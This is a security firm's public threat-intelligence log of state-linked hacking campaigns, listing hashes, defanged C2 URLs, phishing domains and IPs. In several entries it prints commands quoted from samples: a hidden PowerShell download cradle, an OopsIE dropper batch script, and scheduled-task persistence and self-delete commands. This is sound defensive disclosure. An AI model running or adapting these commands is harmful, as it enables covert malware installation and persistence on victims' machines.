Published using Google Docs
Raw Threat Intelligence
Updated automatically every 5 minutes

Raw Threat Intelligence
clearskysec.com | info@clearskysec.com | updates: @ClearskySec

  • Public analysis - “Raw Threat Intelligence” is a public document with primary analysis of cyber attack campaigns.
  • Analysts - Analysis is performed by ClearSky Cyber Security.
  • Comments - The document is open for comments - feel free to write tips, questions, leads and suggestions.
  • Ongoing - Analysis is ongoing, new incidents are added as they are investigated.
  • HTML version - is available here

If you have been targeted you can get our help for free
clearskysec.com/free-targeted-attacks-research 

2021-04-20 Suspicious Lazarus Documents

While monitoring VirusTotal, we identified four malicious documents that share common TTPs. These docx files using remote template injection to download a dotx file from a C2 server, which has a unique remote IP address. Two of the four IPs we have found have been previously reported by F-Secure as Lazarus group. We suspect with medium-low confidence that the new IP addresses are also controlled by the Lazarus group. Unfortunately, we couldn’t retrieve the malicious templates to further investigate the kill chain

Filename: my2.docx

MD5: d0d7d265032e7f1355450692b4d09d3c

SHA-1: 71e13c7d59367ee42a762e62280ee5e6df922cf1

SHA-256: 63e90a1e4df4cf39390d57a307a784dd8d49becaf05702f7b0c0a2666f9653e0

Template URL: hxxp://181.174.164.115/AdjacencyReport.dotx

The server is offshore bulletproof hosting registered in Panama:

In the year 2018, this server served[1] Loki Bot, this activity seem to be unrelated:

Filename: doc_1.docx

MD5: c16295ddf30a5202aad777c0e2dc76c5

SHA-1: 5dd7541ee41fec4ef933943eaddd4208fcff3cbc

SHA-256: 392da41d8c826badf33638a28d17fb88c0d6a2d6db5e5cd6aa2feb78b8c2c868

Template URL: hxxp://181.174.164.115/CoReport.dotx

This file point to the same server in Panama, but to a different dotx file.

Filename: qkxuyneueb.docx

MD5: f62d7b4db17b57b2e15d46fb90c15e10

SHA-1: 654a570f030170a9023a3ad157575b3747e754fb

SHA-256: 73b54fc446117134c10cfeb136799724dbae8f0bfcf4235e686d63416d394629

Template URL: hxxp://95.0.200.212/MedianFax.Dotx

This file point to a template that located on a server that was used as a C2 by Lazarus.

Filename: kexgzywwqg.docx

MD5: 1dcedd5c24623fdf3d9052efd38fe21f

SHA-1: 5588bce60271514977c1540dadb59ef1b921450c

SHA-256: 5dfd9ab1c156f3f73f6e8f81af25945ec99d383c6e0a24764957bdf2aa4b4559

Template URL: hxxp://103.95.99.3/ApothecaryResume.dotx

This file point to a template that located on another server that was also used as a C2 by Lazarus.

Another common TTP is the user that created those files and the creation date.

All files have been created by “john” during April 12th 2021:

This could be a red team, testing the security defenses of some organization by using a remote template of known malicious servers.

Having said that, we can’t deny the fact that 2 of the 3 IPs, used by the Lazarus group.


[1] https://urlhaus.abuse.ch/host/181.174.164.115/

 

2020-12-22: Pay2Key New Variant

Executive Summary

Last week, we published a report about the ransomware group Pay2Key, and attributed them to Fox Kitten, the Iranian APT group that has operated in Israel since 2017, based on both technological and thematic similarities[1]. Monitoring this Iranian threat actor, we have identified a new version of the Pay2Key ransomware in VirusTotal. This new version appears to be a direct upgrade to the previous versions observed by CheckPoint[2].

In this “upgraded” version, new additions were added such as - encrypting the payload with a modified UPX header, Corruption of the IAT and additional code for various Anti Analysis and Debugging methods, additionally, some methods of string encryption were applied onto the binary. By comparing the versions of December against November using Bindiff we observed a 91% code match between both versions of the ransomware.

The changes observed by this report, seem as if the attacker attempted to bring a new development effort to harden analysis of the malware from reverse engineers and security products by using anti analysis methods and encryption. These methods are relatively outdated and can be easily circumvented.


[1] https://www.clearskysec.com/pay2kitten/

[2] https://research.checkpoint.com/2020/ransomware-alert-pay2key/

TTP

Initial Payload

The file is encrypted by UPX as identified by VirusTotal.

However, it does not contain the standard UPX sections and attempts to decrypt the file using standard UPX would result in failure.

This behavior indicates that the developer modified the UPX headers to harden analysis and attempt to avoid security product detection.

Addition of Defense Avoidance and Anti-Analysis

We have performed manual unpacking of the initial payload and reconstructed the PE header so we can view the ransomware code in IDA. First the ransomware will perform various debugging tricks. If one of the following checks fails, the ransomware will attempt to exit and close the program.

Following examples of the debugging tricks:

Invoking IsDebuggerPresent

Invoking CheckRemoteDebuggerPresent

Searching for Debugger Processes in Memory

Checking the PEB for the DebugFlag and the NtGlobalFlag

Performing execution time comparison using GetTickCount

Furthermore, the ransomware attempts to analyze its internal memory structure and attempts to cause exceptions by invoking debugger traps and running unexpected instructions.

Payload

Finally, the ransomware attempts to invoke the API IsDebuggerPresent (It is not clear why however, since this API was invoked at the beginning). If this second check fails the ransomware would load the string “Stop debugging program” and would begin running garbage code to delay analysis, eventually crashing the program.

If these checks pass however, the ransomware will execute as the previous versions. It seems that the developer removed the logging mechanism that documented the ransomwares behavior. Additionally, the developer attempted to add string encryption to harden analysis, but the string encryption only works some of the time as strings can be viewed directly through IDA.

Nevertheless, the developer forgot to remove information from the RTTI structure which contains all the function names and classes of the program which allowed us to identify the Pay2Key’s “Client” Class easily.

Moreover, the PDB path was changed in this version to the following:

M:\\c\\c\\Win32\Release\\Client\\c.pdb

IOCs

MD5: af8b2eb23d9860e41e83292e55e64864

SHA-1:889afcdd1086bbd976a9c137d669b3b3d086f6bb

SHA-256: 93347a47796986520d748bb6cd2385f4613169c008c686da9fe22239806845cb  

2020-09-30: CVE-2020-0968 Exploited in the Wild

Executive Summery

In the beginning of September 2020, ClearSky research found a unique malicious RTF file. The initial file has been uploaded to VirusTotal from Belarus, a country who in the past few weeks, has been home to passionate civilian protests against the government. The file name and its content are forms to be filled about people accused of crimes in the high court.

The RTF file executes arbitrary code from a C2 server. The code execution could be used for further malware download, data theft and a variety of malicious activities. In this case the RTF file downloads an exploit for Internet Explorer, assigned CVE-2020-0968[1]. According to our observation, the vulnerability has not been seen exploited in the wild until now.

Lastly, the Internet Explorer exploit downloads the payload, however, the file is encrypted and needs to be decrypted to be executed.

During the final editing of this alert, we have noticed that there is already a detailed analysis very similar to ours, written in Chinese, they called this attack “Operation Domino”.

File Analysis

The RTF file, which was written in Russian, is a seemingly professional document containing multiple forms to fill concerning people accused in various crimes.

The malicious RTF file

While examining the metadata of the file we came across the following detail – the file has two default languages, Russian and Arabic (From Saudi Arabia).

The RTF file opens a Microsoft Word, that later will execute an arbitrary code of the attackers’ choice – in this case, the software will access an attacker-controlled server via URL Moniker[2] and will download and execute an HTM file. The following is the URL of the HTM file:

hxxp://94.156.174[.]7/up/a1a.htm

The malicious URL inside the OLE object of the RTF

Due to the functionality of URL Moniker, this file would be opened in the background by Internet Explorer, even if it is not the user’s default browser. The Internet Explorer exploit is a Use-after-Free[3] exploit as can be hinted from the variable name and the CollectGarbage function:

a1a.htm file used as an exploit for Internet Explorer

If the Internet Explorer exploit runs successfully, it will download an additional file from the server the Internet Explorer exploit was hosted on – a encrypted DLL file named ‘a1a.dll.’. During our research, we did not observe the ShellCode decrypting and running the DLL successfully.

 Recommendations

Support for Windows 7 ended on January 2020. If you are still using Windows 7 without extended support, and your Office version has not been patched against CVE-2017-0199, you may be vulnerable to this attack.

Indicators

IP

94.156.174[.]7

Files

Hash

File

60981545a5007e5c28c8275d5f51d8f0

СВЕДЕНИЯ О ПОДСУДИМОМ.rtf

7fce761a343ceb15126e7d8f6314c4ed

7fce761a343ceb15126e7d8f6314c4ed

293916AF3A30B3D7A0DC2949115859A6

a1a.htm

67B5D793CF4B0A1DDECF756C42AF47C8

a1a.dll

 

 


[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0968

[2] https://msdn.microsoft.com/en-us/library/ms775149(v=vs.85).aspx

[3] https://cwe.mitre.org/data/definitions/416.html

2020-04-08: Revealing Targets of the Iranian MuddyWater Group, Extracted from their C2

A file founded on MuddyWater C2 contains strings that through testing directed to (among others) an Iranian IP address that is highly probable to be used by the group, as well as strings implying targets in Pakistan, Turkey, and possibly in western countries as well.

The file was published before on AnyRun twitter account[1]. Here, we will present a deep analysis of the file. The txt files we analyzed appeared on two previously known MuddyWater C2 - Advanceorthocenter[.]com, Bonisa[.]ir.

As a result of our familiarity with the structure of the URL sent to the breached C2, cross-referencing the group’s familiar OLE property with details from the .txt files, the location of the Iranian server when testing the infrastructure, and the C2 bearing an Iranian TLD (.ir), we associate the findings to the MuddyWater group with high probability.

kcxyErMOox.txt

A .txt file encoded with base64 that contains logs for many communications received by the group’s C2.

A screenshot of the decrypted information:

An example for the registry stored in the .txt file that represents further information regarding the victim:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; rv:9.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2; BOIE9;ENUS)admin:USER-PC:USER-PC:Windows (32-bit) NT 6.01  <IP Address>

The details stored on the group’s C2 correlate in order and structure to details identified within the .txt file, hereby leading us to conclude that these are logs of infected machines communicating with the group’s Command and Control servers.

Checking the logs indicates that the victims were located in Pakistan, Turkey, the US, Canada, Spain, Germany, and Britain, amongst others. It is impossible to determine whether a VPN service has been used.

Some of the servers that appear on this file are Iranian servers that communicate with the breached C2 server when tested. We can extrapolate that the attackers are using Linux X11 (The X Window System) as their operating system, and Firefox’s Gecko browser. The file shows us tests performed by the Iranians (including conversations amongst themselves like the one regarding the Turkish nation):

Based on User Agent patterns, we located a few different IP addresses that are suspected with medium probability to be used by the group for attacks:

 

103.205.140[.]177

173.205.92[.]72

24.244.207[.]36

87.113.216[.]57

cuRbklbbNP.txt

A test file that is partially base64 coded. Here is a screenshot of it on the server:

At the beginning of the file the target’s IP address is listed (in this file it is located in Pakistan):

203.175.79[.]238

Following this, a name in Arabic is listed, being “gasim”. This name is not common among Farsi speakers, since they have a variant for it pronounced as “Ghasem”, a fact that may further imply the target’s identity.

Further, a cmd command is executed in order to run the executable Powershell.exe, in combination with a few added instructions:

powershell.exe -ExecutionPolicy byp -NoProfile -WindowStyle hidden -enc

The executable will extract the PowerShell command from the text file. The PowerShell command extraction entails 4 main phases:

  1. Decrypting the coding from base64 to a text format is partially Hex coded:

  1. Converting the text from Hex encoded to a decipherable format for the machine. During the decryption an additional base64 code segment is revealed:

  1. Decrypting the remaining text from base64

  1. The PowerShell command decrypts the remainders of it, which is displayed in ASCII and is converted first to decimal, then two a letter format

ASCII

Decimal

Letter

0x69

105

i

0x73

115

S

0x6f

111

o

Following this conversion, all plus signs and quotation marks are removed automatically, resulting in the following command:

$A =(iex) (([System.Text.Encoding]

ASCIIGetString([System.Convert]

$NN= new-object net.webclient

$NN.proxy=[Net.Wei

Indicators

IP

ASN

Note

Malicious

103[.]205[.]140[.]177

LeapSwitch Networks Pvt Ltd

Potential IP of attacker - suspicious as VPN – based on User Agent

 

Reported to abuseipdb.com in 06/12/19 from spain:

Hacking

SQL Injection

Brute Force

Exploited host

Web App Attack

173[.]205[.]92[.]72

QuadraNet Enterprises LLC

Potential IP of attacker - suspicious as VPN – based on User Agent

 

Reported to abuseipdb.com in 08/12/19 from Germany:

Bad Web Bot

24[.]244[.]207[.]36

Edaptivity.com Inc

Potential IP of attacker - suspicious as VPN – based on User Agent

87[.]113[.]216[.]57

British Telecommunications PLC

Dynamic DNS

Potential IP of attacker - suspicious as VPN – based on User Agent

5[.]201[.]174[.]82

Mobin Net Communication Company

Iranian IP of the attacker – non protected by VPN

Non-Malicious

92[.]223[.]89[.]200

G-Core Labs S.A.

3cx

198[.]16[.]66[.]43

Cogent Communications

CDN

66[.]102[.]6[.]44

Google LLC

Google Proxy

 

Hash

Filename

Type + Notes

218fe2e33dcf16c3254ec05c395da7ed

kcxyErMOox.txt

Txt server

f26c9e54f3d0fce99228935278e5a0f8

cuRbklbbNP.txt

Txt powershell

Uncovering a new campaign by the Iranian APT group “Charming Kitten”, Targeting the Baha’i Community

Throughout the past few months, we identified several attacks orchestrated by Charming Kitten APT group, targeting the Baha’i community. We observed an elevation in the sophistication of social engineering methods employed by the group.

In the context of this campaign the attackers impersonated an academic researcher and an officer from the US State Department. Feigning an on-going correspondence, the attackers addressed the target and sent him an acrobat pdf file presenting a letter signed by the US official, containing the phishing link. Once the target fills his credentials, the attackers check if the account can be accessed without 2FA. If unsuccessful, the target will be directed to another  phishing page dedicated to steal two-factor identification.

Once the attackers gained the email credentials, they immediately changed the email account’s passwords, resulting in the target losing access to their email.

TTPs

Emails

This attack is committed in two steps. First, the attackers create a fake correspondence between two emails they got control of, with the malicious file attached, then they share the “alleged” correspondence with the target.

Phase one:

In the initial email, actually sent among themselves, the attackers create the false pretense of a legitimate correspondence to gain the target's trust. In the fake correspondence The “US official” mentions attending a convention at a research institute and meeting the researcher and  discussing the subject of the email.

As part of the email thread, the alleged US official attached a password protected acrobat pdf file, with the password being the last four digits of the researcher’s phone number.

In the following email, the researcher shares the correspondence with the target and relays details from his research and attach the pdf file. The researcher requests the target’s discretion several times to avoid “exposing the information”. The target is sent two “essential” files:

  1. Pdf file, allegedly sent by the US official to the researcher.
  2. An Excel file containing details of dozens of Baha’is personal details.

We learned that the target submitted its login credentials and the attackers succeeded in this attack. After filling his credentials, the target received two emails with alerts about connection attempts from the following IP address (which was located by Google in Ukraine and the United Arab Emirates):

95.216.230[.]247

As part of the camouflage, the attackers feigned innocence and requested the target to try inputting his credentials for a second time, only at this point the link directed to a fake 2FA page.

Excel File

The attackers attached an Excel sheet listing 51 Baha’is from around the globe that have connections to Iran, Israel, or the US. The table has several columns, detailing academic degrees, first names, surnames, religion (Baha’i, repeated throughout the table), Israeli\Central Asian\foreign citizenships, academic and non-academic associations, and related academic institutes.

Flow Chart

Here we present a flow chart detailing the process of attack with regards to possible behaviors by the target:

Indicators

Malicious Hashes

Hash

Filename

VirusTotal Initial Detection

75964ceadf277c7776d7bd5d304b673c

B list – updated.xlsx

-

7aca944ffbdaecf99b506a0d1977207a

Letter 2 – copy.pdf

-

Domain

Myconnect-support[.]com

URL

hxxps://myconnect-support[.]com/Redirect/2/project=%ID%/index.php

IP address

IP

ASN

95.216.230[.]247

Hetzner Online GmbH

2020-02-06: Additional IOCs of Charming Kitten – Pivot on Reuters report and CERTFA findings

Charming Kitten is known for phishing attacks impersonating Google/Microsoft services, and in 2015 was identified as the group behind an attack meant to bypass or steal two-step verification details. Following the recent post[1] published by CERTFA Labs and Raphael Satter’s article in Reuters website[2], we uncovered additional domains, hostnames and an IP address that are apparently related to the group’s activities. Other than pDNS correlation, as described in the post, the indicators we identified redirect to the official Microsoft website -  Microsoft OWA, a mechanism that fits Charming Kitten Modus Operandi and can be seen via URLscan.  The domain names mostly consist of a number of words spaced with hyphens and the words ‘service’, ‘check’, ‘recovery’, and ‘activity’. Most of them have the 'site' or 'info' TLD.

Additional Infrastructure

One of the domains published in the report is two-step-checkup[.]site. Pivoting from this domain leads us to a new IP address, 54[.]38[.]210[.]187. Looking into this new IP address reveals several additional hostnames which we assume to be related to Charming Kitten too.

The new hostname, mobiles[.]recovery-service[.]site, was scanned in URLscan.io 16 days ago and it seems to be a redirection to the official Microsoft website, outlook[.]live[.]com/owa. It fits the scenario described in CERTFA's latest report[3], in which the target is redirected to a legit website if the request to the phishing server was invalid according to the phishing kit.

We identified another hostname, kia-customerservice[.]ddns[.]net, that is hosted under IP addresses published in CERTFA's recent post (51.89.237[.]235), can attest to phishing attempts against targets related to the automobile industry.

Domains

Sub-Domains

IP Addresses

recovery-service[.]site

kia-customerservice[.]ddns[.]net

54[.]38[.]210[.]187

 

www[.]recovery-service[.]site

 

 

mobiles[.]recovery-service[.]site

 

 

In addition to enrichment of indicators following CERTFA Lab's new post published on February 5th, 2020, we have found additional hostnames related to domains that were posted by CERTFA on December 13th, 2018[4]. The post spoke about a wave of focused spear phishing targeted at financial organizations in the US. No current activity was observed with these domains, yet some were recently resolved as late as Nov 2019. In the report from 2018, the IP address 190.2.154[.]38 was attributed to the group. Pivoting on this, we found another domain, potentially used by the group, manage-accounts[.]info and www[.]manage-accounts[.]info. The domain resolved to this dedicated server on late 2018 for two weeks, and since then resolved to multiple hosting services until October 2019.

Indicators

IP address:

·         54[.]38[.]210[.]187

Domains:

·         recovery-service[.]site

·         manage-accounts[.]info

Subdomains:

·         kia-customerservice[.]ddns[.]net

·         www[.]recovery-service[.]site

·         mobiles[.]recovery-service[.]site

List of sub-domains of domains that were disclosed by CERTFA February 5th, 2020[5]:

·         youtube[.]service-activity-checkup[.]site

·         mobiles[.]service-activity-checkup[.]site

·         youtube[.]www[.]service-activity-checkup[.]site

·         www[.]youtube[.]service-activity-checkup[.]site

·         www[.]two-step-checkup[.]site

·         mobile[.]phonechallenges-submit[.]site

·         www[.]phonechallenges-submit[.]site

·         www[.]service-activity-checkup[.]site

List of sub-domains of domains that were disclosed by CERTFA on December 13th, 2018[6]:

·         mail[.]document-share[.]info

·         www[.]document-share[.]info

·         mymobile-sessionid[.]document-share[.]info

·         www[.]com-identifier-servicelog[.]info

·         fwww[.]mobiles-sessionid[.]customize-identity[.]info

·         www[.]mobiles-sessionid[.]customize-identity[.]info

·         www[.]customize-identity[.]info

·         www[.]mobile-sessionid[.]customize-identity[.]info

·         us2[.]account-profile-users[.]info

·         www[.]profile[.]us2-mail-login-profile[.]site

·         www[.]live[.]account-profile-users[.]info

·         www[.]aol[.]account-profile-users[.]info

·         xn--\x09live-ix3b[.]account-profile-users[.]info

·         lotto-niwww[.]account-profile-users[.]info

·         www[.]signin[.]account-profile-users[.]info

·         www[.]lotto-niwww[.]account-profile-users[.]info

·         www[.]us2[.]login-users-account[.]site

·         www[.]us2-mail-login-profile[.]site

·         www[.]login-users-account[.]site

·         profile[.]us2-mail-login-profile[.]site


[1] https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/

[2] https://uk.reuters.com/article/uk-iran-hackers-exclusive/exclusive-iran-linked-hackers-pose-as-journalists-in-email-scam-idUKKBN1ZZ1N6

[3] https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/ (figure 7)

[4] https://blog.certfa.com/posts/the-return-of-the-charming-kitten/

[5] https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/

[6] https://blog.certfa.com/posts/the-return-of-the-charming-kitten/

2019-11-20: MuddyWater Uses New Attack Methods in a Recent Attack Wave

Summary of the event

During October-November, the Iranian attack group MuddyWater carried out new attacks against several targets in the Middle East, mostly in Iraq. This group has been previously active in Israel and are known for infecting targets using DOC files and social engineering.

In this attack wave, we identified for the first time a malware that is designed to attack in Iran by impersonating an international Iranian shipping company - Azim Tarabar. It is possible that the group also engages in internal espionage, in addition to its ongoing activities in the Middle East.

The group began preparing the recent attack infrastructure on August 19. The infrastructure is built on hacked servers that were previously used to store code for the POWERSTATS malware, as well as new hacked servers, like a server by the Saudi firm KSA Hosting. Similar to the group's previous activity, the group hacks into the servers almost always by penetrating into WordPress based open directories in order to plant the malware code.

In the recent attack wave, two kinds of Excel files with an embedded VBscript were used for infection:

1.       The victim is required to input a password to view the Excel file's contents. After inputting the password, the computer is infected. During the research we identified a unique property; a legitimate WScript.exe is downloaded and is used to execute an encoded malicious JavaScript code as a sub-process. This file is disguised as an SSH Tunneling tool named scp.exe. Downloading the Wscript.exe file and changing its name were designed to evade security systems that identify code executions by a parent-process named WScript.exe

2.       Excel files in which the malicious script is activated after the Excel file is closed. In both cases, after running the VBA code, the hacked server is queried. In this attack wave the group used a new attack method – Excel files, unlike Doc files which they have used up until now.

It appears that the infrastructure websites that the group use do not belong to them but were hacked by them and belong to existing firms like KSA Hosting. These websites were built in Wordpress, which was likely not secured, as the access is open to all on Open Directory. All the files were planted in the folder wp-includes.

hxxp:// assignmenthelptoday[.]com/wp-includes/utf8.php  

hxxp:// ksahosting[.]net/wp-includes/utf8.php                                                                                                            

In other cases, the query if for a nvd file called editob.nvd. This name has not been used by the group until now.

hxxps://annapolisfirstlimo[.]com/editob.nvd

Indicators

MD5

7ed6c5e8c3ec4f9499eb793d69a06758

b100c0cfbe59fa66cbb75de65c505ce2

b9ee416f2d9557be692abf448bf2f937

a9706c01de9364eab210ea73296bfe71

1cd71f39ff9fb3bf269440b63c717195

50ac74eb38d6fa07d9f5e788d61a92cd

4022bbb9df5d86226bd9a89f361c94b9

584479a1958a73720c4aebb52c59b21e

269afae11cc9837e732019a03fa02fab

32156247f900883d5106795ec103a624

e18228bee6f1cf12eaf1bb4d5be587bf

5ef459908d5be0672b02cdfe4f606989

66c783e41480e65e287081ff853cc737

2c3a634953a9a2c227a51e8eeac9f137

9d0bfb81f450de8364327a4aaa67d9b3

46f911014f1202e17936f627f34e6165

 

URL

hxxp://graphixo[.]net/wp-includes/utf8.php

hxxp://ksahosting[.]net/wp-includes/utf8.php

hxxps://assignmenthelptoday[.]com/wp-includes/utf8.php

hxxps://annapolisfirstlimo[.]com/editob.nvd

 

 


2019-04-30: Oilrig data dump link analysis

Background

Link analysis

By pivoting off the leaked IP addresses we found connections to multiple publicly published and unpublished campaign. Below are the domains related to the IPs

193.70.17.18

95.168.176.173

213.227.140.35

142.234.200.73

185.174.100.56

213.32.113.190

217.79.185.65

46.105.134.228

 adobelicence.com

lowconnectivity.com

microsoftfixer.com

hpserver.online

updatenodes.site

updatesecuritypatch.com

adpolicer.org

jscript.online

cloudipnameserver.com

adobelicence.com

withyourface.com

googie.email

0ffice36o.com

adpolicer.org

defender-update.com

dns.adobelicence.com

adobelicence.com

dns.msnconnection.com

acrobatverify.com

msnconnection.com

supermario2018.com

anyportals.com

04bd2d1d16b31c115dd5a9adfc1c8e537e6f71d95bc9bead03d22771f781ac19

731076d3e4fdebdd7fb0b9a7c38b3f36343e5a5b4f97b1067838704c9d0e79fe

2f795bce2260fc63ac5cfdd3ac26490bbc6a739c

b674ada860bc9ffcd672304c74ffbe28d0b00650

30ee66450903708b4b78fb3398aab09d

3139d8309a249f2fe49b8feab732e7b6

887b5ec3f50a0a0b15432007fabb7cbf

Abu Dhabi Police.exe

2018-12-20: Human Rights Defenders surveillance

Overlap with infrastructure in “When Best Practice Isn’t Good Enough: Large Campaigns of Phishing Attacks in Middle East and North Africa Target Privacy-Conscious Users” https://www.amnesty.org/en/latest/research/2018/12/when-best-practice-is-not-good-enough/ 

checked-browser.com

settinqs-myaccounts.com

gotolinks.info

youtubes-video.com

browsre-secure.com

myaccount-settinqs.com

click-transfer.com

go2profile.info

youtubeq.net

healthlifeguide.net

urllink.info

blu197-live.com

checked-browsering.com

newswonders.com

applications-secures.com

ebn-taimia.com

redirects-myaccounts.info

redicrects-settings.info

secures-application.com

redicrect-confirmation.info

redicrect-settings.info

secures-myaccounts.com

myaccounts-settinqs.com

settings-profiles.com

browsres-secure.com

login-application.com

blu163-live.com

secure-settinges.com

clicks-transfer.com

browser-checking.com

secures-settinges.com

12olinks.info

checked-browsers.com

secure-browsres.com

2018-10-22: Ukrainian telcos fake domains on servers with Metasploit and Cobalt Strike

24tv[.]agency

2mdns[.]org

a-msedge[.]org

ads1-msn[.]com

ads1-msn[.]net

akadns-ms[.]net

api-p001-1drv[.]com

apostrophe-news[.]biz

appex-bing[.]net

appex-bing[.]org

bigmir[.]email

blob-weather[.]com

cdn-onenote[.]net

censornews[.]org

client-googledns[.]com

cnn-metanews[.]biz

compatexchange-cloudapp[.]com

corpext-datamart[.]net

delometaua[.]biz

diagnostics-support-microsoft[.]net

diagnostics-support[.]com

dns-msftncsi[.]com

eizvestia-news[.]org

espreso[.]today

feedback-google[.]net

feedback-google[.]org

feedback-windows[.]com

feedback-windows[.]org

foxnewsmeta[.]biz

fwdcdn[.]org

gateway-telemetry[.]net

gateway-telemetry[.]org

gazetaua-news[.]org

gismeteo[.]city

img-s-msn-com-akamaized[.]net

interfax-globalnews[.]com

ipv4-microsoft[.]net

ipv4-microsoft[.]org

ipv6-google[.]net

ipv6-google[.]org

ipv6-microsoft[.]org

kyivstar-ip[.]com

ls2web-redmond-corp[.]com

microsoft-com-nsatc[.]org

microsoft-metaservices[.]com

microsoft-nsatc[.]org

ms-akadns[.]com

ms-akadns[.]org

news-liga[.]net

newska-uanews[.]biz

nod-update[.]org

ns0-ukrpack[.]net

ns0-volia[.]net

ns1-datagroup[.]com

ns1-datagroup[.]org

ns1-volia[.]net

ns2-datagroup[.]com

ns2-datagroup[.]org

ns2-ukrtel[.]com

ns3-datagroup[.]org

ns4-datagroup[.]org

obozrevatel-news[.]com

officeclient-microsoft[.]com

paypal-com1[.]com

paypal-com2[.]com

pppoe-infocom[.]com

pppoe-kyivstar[.]com

pppoe-ukrtel[.]com

preview-msn[.]org

redir-metaservices[.]com

redir-metaservices[.]org

reports-telemetry-microsoft[.]com

rian-ua[.]org

sandbox-cloudapp[.]com

sandbox-cloudapp[.]org

search-msn[.]net

search-msn[.]org

secure-telemetry[.]net

secure-telemetry[.]org

securenod32[.]com

segodnya-news[.]org

services-glbdns2[.]com

services-glbdns2[.]org

services-google[.]org

serving-sys-windows[.]net

serving-windows[.]net

social-msn[.]net

social-msn[.]org

ssw-live[.]org

statototalitario[.]com

support-cloudapp[.]net

support-microsoft[.]biz

survey-microsoft[.]net

telecommand-microsoft[.]net

telecommand-microsoft[.]org

telegraf-news[.]biz

telemetry-akadns[.]org

uatimes-meta[.]biz

ubr-news[.]org

ui-skype[.]net

ukrfreshnews[.]com

unian-search[.]com

urs-microsoft[.]net

watson-microsoft[.]org

win-msecnd[.]com

win-msecnd[.]org

win10-telemetry[.]net


91.92.137.59

91.92.137.58

91.92.137.56

91.92.137.46

91.92.137.45

91.92.137.34

91.92.137.33

91.92.137.32

82.202.160.61

109.248.200.55

109.248.200.54

109.248.200.53

109.248.200.16

2018-10-17: Mohammed Dahlan and The Egyptian Intelligence Lure

During our ongoing monitoring of attacking campaigns in the Middle East, we identified a malicious PDF file disguised as an official meeting protocol of Mohammed Dahlan (Palestinian politician, former leader of Fatah) with the Egyptian Intelligence.

The document is blurred and contains a paragraph in Arabic that is supposed to lure the victim to click a link and download an Adobe Reader update. Interestingly, the Google Drive link leads to a malicious APK file by the name: com.adobe.reader.apk. When examining the application that was flagged malicious by 15 AV-providers in VirusTotal, we noticed that as part of its functionality, the application forces setting a new device unlock password, deletes call logs/history, monitor outgoing calls and has vast capabilities.

The file is signed using a digital certificate of which the "issuer" and "subject" sections are filled with words in Turkish (For example: CN=Benim ismim - translation: "my name")

IOCs:

*PDF File:*
MD5    e288426029c09a1f004753b696c19499
File Name: تسريب-اجتماع-القائد-محمد-دحلان-و-المخابرات-المصريه.pdf
File Name Translation: Commander Mohammed Dahlan and The Egyptian Intelligence Meeting (MoM) Leakage
Detection ratio    1 / 61
First submission    2018-10-09 10:24:36 UTC ( 1 week, 1 day ago )
*Submission Country: PS*
Author: SmartS
DocumentID: uuid:AA010778-A645-4FCD-AE1F-C662436DA458
Mutex: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagEJHCMBKGADPAAAAA


*Link for downloading the APK File:*
hxxps://drive[.]google[.]com/uc?authuser=0&id=1vyLbjHuWAy7vCwPBREADGxapfTUesJej&export=download

*APK File*
MD5    ca126e58f704854ea208acca0dd23a69
File Name: com.adobe.reader.apk
Detection ratio    15 / 56
First submission    2018-10-17 13:46:16 UTC ( 22 minutes ago )
https://www.joesandbox.com/analysis/84739/0/pdf  

2018-08-14: Phishing campaign targets Russian banks, metal and steel manufacturers

We have been reported that information in this section was a part of a security assessment and the infrastructure is not malicious. Therefore we removed the information.

2018-08-06: Oilrig OopsIE malware and SpyNote mobile malware

OopsIE dropper

MD5        fe466788a06fc5646bd52fe6732d59bf

SHA-1        b774c171b76c49be5b5efa9374c7d40f5000e184

Authentihash        824b3bbc2604bd638b42d665c118ec687c7657bff4ff9b348b35036a42a3729d

Fake failure message:

C:\Users\admin\AppData\Local\Temp\ztmp\t23092.bat

@echo off

set ztmp=C:\Users\admin\AppData\Local\Temp\ztmp

set MYFILES=C:\Users\admin\AppData\Local\Temp\afolder

set bfcec=t23141.exe

attrib +h C:\Users\admin\AppData\Local\Temp\ztmp

@echo off

 

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5" /v version

if %errorlevel% equ 0 goto v3

 

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v version

if %errorlevel% equ 0 goto v4

 

goto commonexit

 

:v3

copy %MYFILES%\WinSyncMetastoreV2.exe C:\programdata\WinSyncMetastoreV2.exe

C:\programdata\WinSyncMetastoreV2.exe

goto commonexit

 

:v4

copy %MYFILES%\WinSyncMetastoreV4.exe C:\programdata\WinSyncMetastoreV4.exe

C:\programdata\WinSyncMetastoreV4.exe

goto commonexit

 

:commonexit

start "" /wait cmd /c "echo An error occurred during initialization of VpnSrv.dll in 00x41542178!&echo(&pause"

exit

Installation

Drops

OopsIE malware  WinSyncMetastore.exe

WinSyncMetastoreV2.exe

MD5        5998ef679682878e68d5ac4a1733fac5

SHA-256        36e66597a3ff808acf9b3ed9bc93a33a027678b1e262707682a2fd1de7731e23

WinSyncMetastoreV4.exe

MD5        d41207d54b69fb3eeb7a104f7d36c7b0

SHA-256        055b7607848777634b2b17a5c51da7949829ff88084c3cb30bcb3e58aae5d8e9

Persistency

cmd.exe /c SchTasks /Create /SC MINUTE /MO 3 /TN "MicrosoftPrintDrive" /TR "wscript C:\ProgramData\WinSyncMetastore.vbs" /f

C2:

defender-update.com

Samples will run these commands if they detect a sandbox:

cmd.exe /C choice /C Y /N /D Y /T 2 & Del C:\Users\admin\Desktop\sampale.exe

SpyNote android malware

213.227.140.35, the IP address of defender-update\.com, has also served as the command and control server for SpyNote, an off-the-shelf mobile rat.

client.apk

MD5        2820c84cf9f34fe999da0bcedea6915d

SHA-1        0f3ae5c85151686b836fd95e2d680201679101e9

SHA-256        9727b56953bb6622cc1d3a039e2ebf6ef260dd76c8dcc11f4a1320fbf294621d

102.apk

